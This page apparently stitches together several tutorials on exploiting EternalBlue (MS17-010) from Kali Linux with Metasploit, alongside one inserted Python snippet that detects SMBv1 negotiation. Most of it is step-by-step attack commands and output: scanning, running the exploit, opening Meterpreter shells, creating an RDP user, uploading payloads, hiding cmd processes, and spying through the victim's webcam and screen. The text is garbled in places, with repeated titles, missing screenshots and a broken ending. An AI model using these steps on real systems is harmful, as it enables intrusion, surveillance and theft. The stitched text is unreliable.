Eternal blue metasploit kali linux

Exploit EternalBlue Using Kali Linux

In this post I cover how to exploit EternalBlue using Kali Linux. What is EternalBlue, and why are we exploiting it? EternalBlue is the name of a vulnerability discovered in the Windows operating system. It stems from the way Windows implemented version 1.0 of the Server Message Block (SMB) protocol, which left it open to exploitation. Since the exploit was leaked, Rapid7 and the community have added exploit modules to the Metasploit Framework for us to use in testing. Microsoft designated the vulnerability MS17-010. After bad actors exploited it in the WannaCry disaster, Microsoft reacted by releasing a patch. They even released one for Windows XP, which was already out of support.

This is an extensive tutorial on exploiting EternalBlue from Kali Linux with a Metasploit exploit module. The msfconsole makes this exploit available for compromising the victim machine we are targeting. It also provides a robust and mature architecture for reporting on and scaling our ethical hacking efforts.

Here’s What You Need:

Here’s what EHG is using: a Kali Linux virtual machine and a Windows XP SP1 virtual instance, both in VirtualBox. After placing both virtual machines on the same internal network adapter, the first step is to start Metasploit within Kali Linux. Note: Always be sure that you are the master of your virtual network. In other words, don’t let your scans accidentally start tapping devices on a network you are not authorized to scan. Use an Internal or Host-Only network in VirtualBox!

Notice that the next step is to create a workspace for this demo. Get in the habit of using workspaces, because they really help organize things. Switch between workspaces at any time using the command workspace <name>.

Step 1: Setup and Gather Info

# FOLLOW THESE DIRECTIONS!
# start the database server
root@kali:~# service postgresql start
root@kali:~# msfdb init
root@kali:~# msfconsole
# create workspace. -a for "add"
msf > workspace -a eternal_blue_demo
[*] Added workspace: eternal_blue_demo

To recap what is set up so far: a workspace for the demo exists, the msf database server is running, and the database has been created and initialized. Now turn to the target machine. Remember that Metasploit exploits have required options; list them with the command show options. Notice that one line returned by the nmap scan gives the workgroup name, WORKGROUP. This is needed later for exploiting, because it is a required option. If this machine were domain-joined you would use the domain name instead. The same information can be found using nbtscan.

msf > db_nmap -A -O -sV 10.0.1.10
[*] Nmap: | Workgroup: WORKGROUP\x00
msf > nbtscan -v -s : 10.0.1.10
[*] exec: nbtscan -v -s : 10.0.1.10
10.0.1.10:WORKGROUP :00G
10.0.1.10:WORKGROUP :1eG
10.0.1.10:WORKGROUP :1dU

Step 2: Scan for the Vulnerability

The next step fits in with the normal Kali Linux gather-and-destroy process. The usual steps are to gather information, exploit vulnerabilities, escalate privileges, move laterally, and exfiltrate. This is similar to the MITRE ATT&CK matrix. Google it for a nice visual look at the overall process.


With this information, return to the task of setting up an exploit. Running search ms17-010 lists all the available modules. In the results of that search there is an auxiliary scanner named smb_ms17_010. This is what we need: an exploit will only work against a victim machine that actually has the EternalBlue vulnerability, so we have to check first, and the scanner does exactly that.

msf > use auxiliary/scanner/smb/smb_ms17_010 
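The smb_ms17_010 scanner selected above (and in the later write-ups on this page) talks SMBv1 to the target, because the vulnerability lives in that protocol version. From the defender's side the matching signal is a host that still negotiates SMBv1 on port 445, so here is an added example, not part of the original post, that parses a NetBIOS-framed SMB negotiate message and reports which dialects are offered, separating a legacy SMB1-only client from a modern client that merely starts in SMB1 before upgrading to SMB2. The sample packets are constructed inline with the helper build_smb1_negotiate, not captured traffic.

```python
import struct

SMB1_MAGIC = b"\xffSMB"          # SMBv1 header signature
SMB2_MAGIC = b"\xfeSMB"          # SMB2/3 header signature
SMB_COM_NEGOTIATE = 0x72         # SMBv1 NEGOTIATE command code

def build_smb1_negotiate(dialects):
    """Build a NetBIOS-framed SMBv1 NEGOTIATE request (only used to construct sample input)."""
    header = SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE]) + b"\x00" * 27   # 32-byte SMB1 header
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    body = header + b"\x00" + struct.pack("<H", len(data)) + data      # WordCount=0, ByteCount, dialects
    return b"\x00" + len(body).to_bytes(3, "big") + body               # NetBIOS session message framing

def parse_negotiate(pkt):
    """Classify one NetBIOS session message; for an SMBv1 NEGOTIATE also return the offered dialects."""
    if len(pkt) < 4 or pkt[0] != 0x00:
        return "not_smb", []
    length = int.from_bytes(pkt[1:4], "big")
    body = pkt[4:4 + length]
    if len(body) != length or len(body) < 4:    # short read or truncated capture
        return "truncated", []
    if body[:4] == SMB2_MAGIC:
        return "smb2", []
    if body[:4] != SMB1_MAGIC:
        return "not_smb", []
    if len(body) < 35 or body[4] != SMB_COM_NEGOTIATE:
        return "smb1_other", []
    off = 33 + 2 * body[32]                     # skip WordCount and the parameter words
    if len(body) < off + 2:
        return "truncated", []
    byte_count = struct.unpack_from("<H", body, off)[0]
    data = body[off + 2:off + 2 + byte_count]
    dialects, i = [], 0
    while i < len(data) and data[i] == 0x02:    # each dialect: 0x02 + NUL-terminated ASCII string
        end = data.find(b"\x00", i + 1)
        if end < 0:
            break
        dialects.append(data[i + 1:end].decode("ascii", "replace"))
        i = end + 1
    return "smb1_negotiate", dialects

def smb1_only(pkt):
    """True for a client that negotiates SMBv1 and offers no SMB2 dialect, i.e. a pure legacy speaker."""
    kind, dialects = parse_negotiate(pkt)
    return kind == "smb1_negotiate" and bool(dialects) and not any(d.startswith("SMB 2.") for d in dialects)

# Constructed samples (not captured traffic): an SMB1-only legacy client and a multi-protocol client.
LEGACY = build_smb1_negotiate(["PC NETWORK PROGRAM 1.0", "LANMAN1.0", "NT LM 0.12"])
MODERN = build_smb1_negotiate(["NT LM 0.12", "SMB 2.002", "SMB 2.???"])
```

Feeding the first message of each inbound port 445 session through smb1_only gives an inventory of hosts that still depend on SMBv1, which is the population to patch or to have the protocol disabled on.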

Step 3: Exploit

When choosing an exploit it is best to pick the one with the fewest options labeled “required”. Why? Fewer requirements means fewer variables to manage; it is also faster and easier, and sticking with the defaults makes the whole process simpler and less error-prone. It turns out exploit/windows/smb/ms17_010_eternalblue is suited to Windows 7 targets, so it won’t work here: the target machine is 32-bit Windows XP. That leads the search for a suitable exploit to exploit/windows/smb/ms17_010_psexec. Once it runs, the line Server username: NT AUTHORITY\SYSTEM indicates that root-level (SYSTEM) access has been achieved. At this point virtually anything can be done.

Luckily, as far as configurations go this is an easy one. Leaving all the default settings as they are, only two fields need to be set: LHOST and RHOST. The LHOST is the listening host (the attacker machine that the payload calls back to) and the RHOST is the receiving host (the target). This makes sense once you examine the default payload, which is a reverse TCP Meterpreter shell. The way it works is a nudge towards how modern security architecture works. Think of the possible payloads you could use in this scenario, and then think of the massive, in reach and in scale, system that is the modern firewall. That system’s sole purpose is to block, and the reverse TCP shell is a method created in response to firewalls: the shell executes on the victim machine and calls back out to the attacker machine. Think about it: what security architecture denies most outbound traffic? Very few do, and that leaves room for this payload type to work.

# choose an exploit
msf > use exploit/windows/smb/ms17_010_eternalblue
# show options
msf > show options
# go back and see others
msf > back
# choose a new exploit for XP systems
msf > use exploit/windows/smb/ms17_010_psexec
# set victim ip as RHOST
msf exploit(windows/smb/ms17_010_psexec) > set RHOST 10.0.1.10
RHOST => 10.0.1.10
# set attacker ip as LHOST
msf exploit(windows/smb/ms17_010_psexec) > set LHOST 10.0.1.7
LHOST => 10.0.1.7
# exploit!
msf exploit(windows/smb/ms17_010_psexec) > exploit
[*] Meterpreter session 1 opened (10.0.1.7:4444 -> 10.0.1.10:1079) at 2019-02-21 13:01:06 -0500
# simple check for what user is currently running
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Let’s say there are dozens or hundreds of devices that you are now exploiting for a penetration test. Collecting credentials is standard practice for progressing the test’s overall goals. But how can you test all those usernames and passwords? Doing it manually takes forever. My recommendation for automating this is CredNinja; see the post EHG made on it.


Preface

Eternal Blue became public on the evening of April 14, 2017, when the hacker group Shadow Brokers released a large number of network attack tools, including the «Eternal Blue» tool, which uses the SMB vulnerability of the Windows system to obtain the highest privileges on the system. On May 12, criminals turned «Eternal Blue» into the WannaCry ransomware virus. Many university intranets, large corporate intranets and government private networks in the U.K., Russia, the rest of Europe and China were hit and extorted: a high ransom was demanded to decrypt and restore the files.

Ready to work

PC: Windows 7 (without the patch installed) and Kali Linux

Find the target machine

ifconfig               # view the IP address of the local machine
nmap 192.168.1.0/24    # scan for other hosts in the LAN

Take the host with IP 192.168.1.5 as the target machine.

Use msfconsole

msfconsole is a powerful interface program and an integrated, centralized console. Through msfconsole you can access and use all Metasploit plug-ins, payloads, exploit modules, post modules, and so on.

msfconsole                                  # enter msfconsole
use auxiliary/scanner/smb/smb_ms17_010      # scanner module for the vulnerability
show options                                # view what needs to be set

The options marked Required = yes need to be set.

set rhosts 192.168.1.5
run                      # execute the scan



use exploit/windows/smb/ms17_010_eternalblue    # load the Eternal Blue attack module
show options

Some options are already filled in; we only need to set the target machine’s IP address and the attack payload.

set rhost 192.168.1.5
set payload windows/x64/meterpreter/bind_tcp    # set the attack payload
exploit                                         # run the attack

Remote login to Win7

run post/windows/manage/enable_rdp                                    # run the enable_rdp script
run post/windows/manage/enable_rdp USERNAME=icbug PASSWORD=123456     # create a user

Create a new terminal


Enter the account name and password just created.

At this point we have logged into the Win7 system through the Eternal Blue vulnerability.


Eternal blue metasploit kali linux

1. A computer or virtual machine with Kali Linux installed (VMX files can be downloaded directly from the official website)
2. A computer with Windows 7 installed

Preparation:

1. Uninstall the Windows 7 update that fixes the Eternal Blue vulnerability.
2. Turn off all anti-virus software in Windows 7 (for example 360, glow, Kaspersky).

Experiment started:

1. In Kali Linux, search for Metasploit Framework and double-click to open it.
2. Enter the password (if you downloaded the VMX or OVA file directly from the official website, the password defaults to Kali).

3. Wait a while until loading is complete, then enter

use auxiliary/scanner/smb/smb_ms17_010 

to use the MS17-010 vulnerability scanner module.


4. Enter

use exploit/windows/smb/ms17_010_eternalblue 

to use the ms17_010_eternalblue module.

5. Go back to Windows 7 and run ipconfig in CMD to find the target’s IP address (192.168.0.104).
6. In Kali Linux, enter
set rhosts 192.168.0.104
Note: the value after rhosts is your target’s IP address!

Start the attack!
When Host is likely VULNERABLE appears, the target machine has the «Eternal Blue» vulnerability.
When WIN appears, the attack has succeeded!

Note: If you see the error shown in the picture below:

Check whether the firewall of the target host is turned off and whether the security software is disabled; if it still fails, restart the target host.

Intrusion succeeded:

After the intrusion succeeds, you will find that the target host stops responding.

Enter help to view the available commands.

You will find that there is a lot you can do.
E.g:
1. View system information

2. Monitor the camera
This requires the target host to have a camera (if you run the target in a virtual machine on a laptop, you can attach the laptop camera to the virtual machine).
Enter the command to view the camera list:

Enter the command to connect to a camera:

The number after the stream command is the index shown before the camera you want to connect to in the list.

The browser then opens automatically to view the camera. (To protect privacy, the screenshot is covered with a white box.)

Close the browser, return to the terminal and press Ctrl-C to stop monitoring the camera.

3. Upload and download files
Use the upload command:

upload <file to upload> <path on the target machine>
upload /home/kali/Desktop/payload.exe C:\\Users\\Public\\Desktop 

Note that the target directory path must use double backslashes \\!

The file can be seen to have appeared on the target’s desktop.

Use the download command:

download <file path on the target> <download path on Kali>
download C:\\123.txt /home/kali/Desktop 

The file we wanted is now on the Kali Linux desktop.

4. Remotely execute cmd commands
Use the command to open CMD:

Here execute means run, and -H means a hidden process (HIDE).

The familiar cmd interface, and now we have administrator privileges!
You can now run any command, such as cd, tasklist, dir, del, etc.

To exit CMD, just enter exit; if it asks Terminate channel XXX? [y/N], press Y and then Enter.

5. Watch the target machine in real time
Enter the command
screenshare

Success!
Return to the terminal and press Ctrl-C to stop.

6. Many more commands
There are many more commands; enter help to view them, along with a detailed explanation of each command.

7. Exit Meterpreter
Enter the command:

If you want to take control again, enter run.

At this point, the attack on Windows 7 has succeeded!

Note: Repeatedly exiting and re-running the exploit is not recommended, otherwise the target may blue screen.

One more note

Close 360 and the other anti-virus software mentioned above, otherwise:
